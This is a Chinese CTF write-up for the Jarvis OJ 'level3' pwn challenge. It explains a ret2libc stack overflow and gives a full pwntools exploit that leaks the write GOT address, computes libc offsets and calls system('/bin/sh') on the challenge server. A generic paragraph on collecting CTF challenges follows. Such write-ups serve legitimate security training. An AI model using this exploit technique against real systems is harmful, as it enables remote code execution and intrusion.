CTF-PWN-level3(Jarvis OJ)

发现这个系列的题构造都差不多……不过不同的是这道题中没有给出system的地址。

checksec一下发现cannary没开,于是分析read函数,发现可以栈溢出。

基本思路就是先利用第二个write函数打印出write函数的got表地址。然后再在给出的libc库中找到write函数的地址,计算偏移值offset。再从libc库中找到system,/bin/sh的地址,通过offset和栈溢出覆盖到read函数的返回地址即可。

通过命令

strings -a -t x ./libc-2.19.so | grep "/bin/sh"

即可找到库中/bin/sh地址

具体细节见如下exp:

from pwn import *
context(os='linux',arch='i386',log_level='debug')
p=remote("pwn2.jarvisoj.com",9879)
#p=process("./level3")

elf=ELF("level3")
main_addr=0x08048484
plt_write=elf.plt["write"]
p.recvline()
payload = "A" * 0x8C + p32(plt_write) + p32(main_addr) + p32(1) + p32(elf.got["write"]) + p32(4)
#多函数的调用规律:
#fun1_adr+fun2_adr+....+fun1_args+fun2_args
#根据伪代码write函数的参数,可以推断出我们构造的write函数的参数
p.send(payload)
write_addr=u32(p.recv(4))

libc=ELF("libc-2.19.so")
libc_system=libc.symbols["system"]
libc_binsh=0x162d4c #由上文中的命令直接得到的地址
libc_write=libc.symbols["write"]
system_addr=write_addr-libc_write+libc_system
binsh_addr=write_addr-libc_write+libc_binsh

p.recvline()

payload = "A" * 0x8C  + p32(system_addr) + p32(0xdeadbeef) + p32(binsh_addr) 
#格式为fun_adr+返回地址+参数,返回地址可以随意调用

p.sendline(payload)

p.interactive()

 

 

ctfd-pwn是一个非常受欢迎的CTF(Capture The Flag)比赛中的一个赛题类型,它主要涉及二进制漏洞的利用和系统安全的挑战。 在ctfd-pwn赛题的收集过程中,通常需要考虑以下几个方面: 1. 题目类型:ctfd-pwn赛题可以包含多种类型的漏洞,例如缓冲区溢出、格式化字符串漏洞、整数溢出等。在收集赛题时需要确保涵盖各种漏洞类型,增加题目的多样性和挑战性。 2. 难度级别:赛题的难度级别应该根据参赛者的水平来确定。可以设置多个难度级别的赛题,包括初级、中级和高级,以便参赛者可以逐步提高自己的技能。 3. 原创性:收集ctfd-pwn赛题时应尽量保持赛题的原创性,避免过多的抄袭或重复的赛题。这有助于增加参赛者的学习价值,同时也能提高比赛的公平性。 4. 实用性:收集的赛题应该具有实际应用的意义,能够模拟真实的漏洞和攻击场景。这样可以帮助参赛者更好地理解和掌握系统安全的基本原理。 5. 文档和解答:为每个收集的赛题准备详细的文档和解答是很有必要的。这些文档包括赛题的描述、利用漏洞的步骤和参考资源等,可以帮助参赛者更好地理解赛题和解题思路。 6. 持续更新:CTF比赛的赛题应该定期进行更新和维护,以适应不断变化的网络安全环境。同时也要根据参赛者的反馈和需求,不断收集新的赛题,提供更好的比赛体验。 综上所述,ctfd-pwn赛题的收集需要考虑赛题类型、难度级别、原创性、实用性、文档和解答的准备,以及持续更新的需求。这样才能提供一个富有挑战性和教育性的CTF比赛平台。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值